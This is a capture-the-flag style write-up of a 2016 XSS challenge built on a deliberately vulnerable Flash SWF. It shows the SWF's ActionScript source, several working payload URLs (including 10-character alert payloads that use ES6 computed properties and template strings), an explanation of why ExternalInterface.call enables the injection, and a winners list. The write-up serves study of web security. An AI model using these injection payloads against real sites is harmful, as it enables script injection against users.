-
Notifications
You must be signed in to change notification settings - Fork 222
H5SC Mini Challenge 4
This challenge was public for a few hours on 1st of April 2016. It involved Flash, ExternalInterface, one obvious - and another less obvious solution. So, keep reading - it might not be that boring in the end.
{
import flash.display.Sprite;
import flash.external.ExternalInterface;
import flash.text.TextField;
public class Main extends Sprite
{
public function Main()
{
ExternalInterface.call('console.dir', loaderInfo.parameters);
var text:TextField = new TextField();
text.height = 200;
text.width = 600;
text.text = "Can you XSS me? Execute an alert(1) and win fame and glory :)\r\nSend a mail to [email protected] once you did it.";
text.text += loaderInfo.parameters.text?loaderInfo.parameters.text:"";
addChild(text);
}
}
}There is one solution, that is obvious - and it involves breaking the string that contains the value of one of the Flash variables. You can simply do this to trigger the alert:
https://html5sec.org/minichallenges/4?text=\%22})));alert(1)}catch(e){}//
As many people found out via Flash de-compilation (JPEXS is a great tool for that), there is a Flash variable (flashVar) in use and its name is text. So why not go with that. Flash forgets to escape the escaper, we break the string, payload arrives in the try-catch block ExternalInterface generates and boom. The classic way.
But we can also do this:
https://html5sec.org/minichallenges/4?x=\%22})));alert(1)}catch(e){}//
We don't need to use the existing flashVar, we can use whatever we variable name want. Strange? Can we go even further? What if the SWF file we attack now starts to escape properly on its own? By replacing \ with \\ for example, as often seen in the wild?
And how can it be possible to score a valid solution with only ten characters? And not more than thirty as seen above?
The bad code in place has obviously nothing to do with misuse of the flashVar called text, but with this snippet:
ExternalInterface.call('console.dir', loaderInfo.parameters);This code basically takes an object as the second argument for ExternalInterface.call, meaning, the first argument for the function, that Flash attempts to invoke in the surrounding DOM. The solutions seen above would have worked independently of the name of the Flash variable, just throwing it into the ExternalInterface.call method does the job. The attack breaks the string - new JavaScript code gets injected and done.
try { __flash__toXML(console.log(({text:"\\"})));alert(1)}catch(e){}//"}))}catch(e){}//:""}))) ; } catch (e) { "<undefined/>"; }
^---- Flash escapes the quote, but not the backslash.But we don't really need a property-value-pair to get the job done. This is the shortest solution we received:
https://html5sec.org/minichallenges/4?[alert(1)]
Or even...
https://html5sec.org/minichallenges/4?[alert`1`]
This URL creates an object loaderInfo.parameters that looks like this:
loaderInfo
> parameters
> [alert`1`]
> undefined
That means, in the resulting string that ExternalInterface.call generates, the following object is being used:
try { __flash__toXML(console.log(({[alert`1`]:undefined))}catch(e){}//:""}))) ; } catch (e) { "<undefined/>"; }
^------ no string breakage
This means, if we can inject into a property name or label, we don't have to break any strings. Nor do we have to use any parenthesis. We make dual use of ES6 (or ES2015 fwiw) and utilize computed properties and template strings. Depending on how the stars are aligned, this might save an XSS that would otherwise be unexploitable.
- @xrekkusu 10 chars
- @tunnelshade_ 10 chars
- @petecorey 10 chars
- Y. Q. Yang 12 chars
- @smiegles 13 chars
- @pouyadarabi 13 chars
- @avlidienbrunn 14 chars
- @fransrosen 27 chars
- @mriccia 27 chars
- @hykatza 26 chars
- @llamakko_cafe 26 chars
- @fab_tc 31 chars
- @en4rab 32 chars
- M. B. Rad 33 chars
- @simps0n 34 chars